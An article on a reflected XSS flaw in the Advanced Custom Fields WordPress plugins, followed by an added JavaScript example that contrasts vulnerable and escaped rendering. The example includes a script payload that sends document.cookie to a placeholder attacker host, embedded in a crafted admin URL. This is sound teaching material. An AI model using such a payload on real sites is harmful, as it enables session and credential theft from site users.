
A vulnerability in a widely used WordPress plugin could put up to two million websites at risk, a cybersecurity expert has warned.
Graham Cluley posted an update on his blog on May 5th, warning that the plugin vulnerability could leave multiple websites open to cross-site scripting (XSS) attacks.
These occur when a web application places user-supplied input into the HTML it serves without properly escaping it, so that an attacker's script ends up running in the browsers of other users who view the affected page.
“Millions of WordPress-powered websites are using the Advanced Custom Fields and Advanced Custom Fields Pro plugins, which security researchers say have been vulnerable to cross-site scripting (XSS) attacks,” said Cluley.
He added that this “high severity vulnerability” could be used by a “malicious hacker” to inject malicious scripts, such as redirects, adverts and other HTML payloads, into an affected site, where they would then run in the browsers of users visiting it.
Cluley added that the vulnerability's severity was “somewhat mitigated” by its reliance on social engineering, that is, on a bad actor duping another computer user into clicking on a malicious link.
“It could only be exploited by logged-in users who had access to the vulnerable plugin, meaning that a non-logged-in attacker would have to trick someone who was logged in with the appropriate privileges to visit a malicious URL to trigger an attack,” said Cluley.
He added: “Although that is clearly much better than if the attack could be initiated by anyone accessing the website, it’s still important that affected sites are patched promptly.”
Cluley credited security researcher Rafie Muhammad for discovering the XSS bug three days previously.
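The conditions Cluley describes above, a logged-in user with access to the plugin being tricked into visiting a crafted URL, are those of a reflected XSS bug. The following is an added example written for this page, not code from the Advanced Custom Fields plugin or from Cluley's post: a minimal admin-only page that reflects a query-string parameter into its HTML, shown in its vulnerable form beside an escaped form, with a simulated request handler that enforces the login and capability gate. The page path, the `status` parameter, the `session` fields, the hostnames and the payload are all hypothetical constructions.

```javascript
// Added example (not the plugin's code): a reflected-XSS scenario mirroring
// the conditions described above. Page name, parameter name, session fields,
// hostnames and payload are hypothetical constructions for illustration.

// Escape the characters that matter in HTML text and attribute context.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#039;");
}

// Vulnerable rendering: the `status` parameter is dropped into the markup as-is.
function renderVulnerable(query) {
  const status = query.get("status") ?? "all";
  return `<h1>Posts</h1><p>Showing: ${status}</p>`;
}

// Hardened rendering: same page, but the reflected value is escaped first.
function renderHardened(query) {
  const status = query.get("status") ?? "all";
  return `<h1>Posts</h1><p>Showing: ${escapeHtml(status)}</p>`;
}

// Simulated request handling. `session.loggedIn` and `session.canUsePlugin`
// stand in for WordPress authentication and the capability that gates the
// plugin's admin page; both are assumptions of this example.
function handleRequest(url, session, render) {
  const query = new URL(url).searchParams;
  if (!session.loggedIn || !session.canUsePlugin) {
    // An unauthenticated attacker cannot reach the vulnerable page directly.
    return { status: 403, body: "forbidden" };
  }
  return { status: 200, body: render(query) };
}

// The "malicious URL" an attacker would need a privileged victim to visit.
// Hostnames and path are placeholders.
const PAYLOAD = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>';
const MALICIOUS_URL =
  "https://victim-site.example/wp-admin/admin.php?page=example-plugin&status=" +
  encodeURIComponent(PAYLOAD);

// Crude check: does the response body contain a live <script> tag?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

const attacker = { loggedIn: false, canUsePlugin: false };
const victimAdmin = { loggedIn: true, canUsePlugin: true };

// Runs the three cases that matter: the attacker alone, the victim on the
// vulnerable page, and the victim on the hardened page.
function demo() {
  return {
    attackerDirect: handleRequest(MALICIOUS_URL, attacker, renderVulnerable).status,
    victimVulnerable: containsScriptTag(
      handleRequest(MALICIOUS_URL, victimAdmin, renderVulnerable).body
    ),
    victimHardened: containsScriptTag(
      handleRequest(MALICIOUS_URL, victimAdmin, renderHardened).body
    ),
  };
}

console.log(demo());
```

The attacker's own request is refused, which is the mitigation Cluley mentions; only once a logged-in user with the right capability opens the crafted link does the payload land in a served page, and only the unescaped rendering lets it execute. Escaping at the point of output (WordPress core ships `esc_html()` and `esc_attr()` for this) is the fix, not filtering the input.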